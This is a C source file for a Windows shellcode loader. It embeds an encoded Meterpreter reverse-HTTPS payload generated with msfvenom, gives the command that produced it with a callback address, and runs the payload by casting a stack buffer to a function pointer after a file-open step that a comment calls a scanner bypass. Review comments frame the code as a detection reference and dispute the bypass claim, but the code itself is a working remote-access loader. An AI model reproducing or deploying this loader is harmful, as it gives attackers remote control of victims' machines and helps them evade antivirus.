#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <windows.h>
#include <tchar.h>
#include <stdlib.h>
#include <strsafe.h>
/*
 * Transfer control to the raw bytes at `shellcode` by reinterpreting the
 * pointer as a function pointer and calling it. The call's result is cast
 * to int and discarded; nothing here checks that the buffer is executable
 * or that control ever returns.
 *
 * NOTE(review): this cast-and-call on a data buffer is the defining
 * characteristic of a shellcode loader; memory-permission and behavioural
 * detections should key on a call target inside a writable (here, stack)
 * region. Whether the call succeeds depends on the build's stack
 * executability settings, which are not visible in this file.
 */
void exec_shellcode(unsigned char *shellcode)
{
int (*funct)();
funct = (int (*)()) shellcode;
(int)(*funct)();
}
/*
 * Entry point: opens (creating if absent) hello.txt, then hands control to
 * the embedded payload via exec_shellcode(). argc/argv are unused.
 *
 * Returns: exit(0) if the CreateFile call fails; otherwise falls off the end
 * of main only if the payload returns, which this file does not establish.
 */
int main (int argc, char **argv)
{
/* msfvenom -p windows/meterpreter/reverse_https lhost=192.168.153.149 lport=443 -e x86/shikata_ga_nai -f c -a x86 --platform Windows
*/
/*
 * Opaque encoded payload emitted by the generator named above; its contents
 * are not interpretable from this file. The stack array's length is fixed by
 * the literal, and the trailing NUL from the string literal is included.
 */
unsigned char buffer[]=
"\xda\xcc\xba\x6f\x33\x72\xc4\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
"\x75\x31\x56\x18\x83\xc6\x04\x03\x56\x7b\xd1\x87\x38\x6b\x97"
"\x68\xc1\x6b\xf8\xe1\x24\x5a\x38\x95\x2d\xcc\x88\xdd\x60\xe0"
"\x63\xb3\x90\x73\x01\x1c\x96\x34\xac\x7a\x99\xc5\x9d\xbf\xb8"
"\x45\xdc\x93\x1a\x74\x2f\xe6\x5b\xb1\x52\x0b\x09\x6a\x18\xbe"
"\xbe\x1f\x54\x03\x34\x53\x78\x03\xa9\x23\x7b\x22\x7c\x38\x22"
"\xe4\x7e\xed\x5e\xad\x98\xf2\x5b\x67\x12\xc0\x10\x76\xf2\x19"
"\xd8\xd5\x3b\x96\x2b\x27\x7b\x10\xd4\x52\x75\x63\x69\x65\x42"
"\x1e\xb5\xe0\x51\xb8\x3e\x52\xbe\x39\x92\x05\x35\x35\x5f\x41"
"\x11\x59\x5e\x86\x29\x65\xeb\x29\xfe\xec\xaf\x0d\xda\xb5\x74"
"\x2f\x7b\x13\xda\x50\x9b\xfc\x83\xf4\xd7\x10\xd7\x84\xb5\x7c"
"\x49\xf2\x31\x7c\xfd\x8b\xd0\x12\x94\x27\x4b\xa6\x11\xee\x8c"
"\xc9\x0b\xdf\x49\x66\xe7\x73\x3d\xdb\x6f\x4e\x97\xa2\xc8\x51"
"\xc2\x07\x44\xc4\xee\xf4\x39\x70\x4a\xfb\xbd\x80\x44\x03\xbd"
"\x80\x94\xdc\xd9\xec\xcc\x40\x5e\xa0\xa5\xee\xec\x4f\x46\xa1"
"\x46\x80\x9f\x6a\x21\xd8\x86\xc7\xfe\x59\x4b\xaf\x72\x1b\xf3"
"\x61\x22\xf8\x31\x17\xa2\xbf\x60\xa9\x1e\x05\xbc\x7f\x00\xcb"
"\x8b\x18\xe7\x87\x40\x93\x25\x61\x38\x2b\x23\x46\x84\xac\xc7"
"\xca\x3f\x7d\x6a\x5d\x12\xca\x01\x34\xf6\xb5\xb8\xd8\xa6\x3c"
"\x2c\x4f\x31\xd5\xc3\xec\xf1\x40\x74\xbe\x68\xe1\x3c\x29\x31"
"\x7f\xc7\xf0\x93\x25\x5f\x37\x2e\x90\xda\x51\x76\x43\xa2\xab"
"\xe5\x83\x7c\xbc\xbe\x0a\xe3\xfa\xbe\xd9\x95\xc5\x12\x89\xa5"
"\xfb\x74\xcd\xf5\xa8\x27\x9a\xaa\x18\xa0\xcf\x18\x8b\x0b\xf0"
"\x76\x45\x01\x04\x26\x02\x56\x2b\xd8\xd2\xdf\xab\xb2\xd6\x8f"
"\x41\x5c\x81\x47\xe0\x24\xb3\x1e\xf5\x7c\x98\x4d\x5a\x2c\x49"
"\x1a\x71\xd4\x6d\xa1\x76\x0d\x08\x95\xfd\xba\x7b\x9e\xee\xc2"
"\x7b\xf6\x54\x33\x4e\xe6\xab\x66\xfe\x93\x9e\x61\x4d\x5c\x20"
"\x72\x24\x1c\x48\x72\xa8\x9c\x88\x1a\xc8\x9c\xc8\xda\x9b\xf4"
"\x90\x7e\x48\xe0\xdf\xaa\xfc\xb9\x4c\xdc\xe4\x69\x1a\xde\xca"
"\x95\xda\x8d\x5c\xfe\xc8\xa7\xe8\x1c\x13\x12\x6f\x20\x9f\x52"
"\xfb\xa6\x5e\xae\x79\x68\x15\xd5\xda\xaa\x8a\xfd\xb0\xd3\xcb"
"\x01\x77\x15\x01\xd0\x49\x53\x5d\x02\x9b\xae\xae\x74\xea\xe4"
"\xe9\x88\xb7\xf5\xbc\x2b\x91\x9f\xbe\x78\xe1\xb5";
/*
Here is the bypass. A file is written, this bypasses the scan engine
*/
/*
 * NOTE(review): the comment above overstates what the call below does.
 * OPEN_ALWAYS opens hello.txt in the current directory and creates it if it
 * does not exist, but with FILE_READ_DATA access no data is ever written,
 * and the handle is never closed (it leaks until process exit). Nothing in
 * this file demonstrates any effect on a scanning engine; treat the
 * file-creation-then-call sequence as a behavioural indicator, not as an
 * established evasion.
 */
HANDLE hFile;
hFile= CreateFile(_T("hello.txt"), FILE_READ_DATA, FILE_SHARE_READ, NULL, OPEN_ALWAYS, 0, NULL);
/* On failure the process exits with status 0, so the caller cannot
 * distinguish "could not open" from normal completion. */
if (hFile == INVALID_HANDLE_VALUE)
exit(0);
exec_shellcode(buffer);
}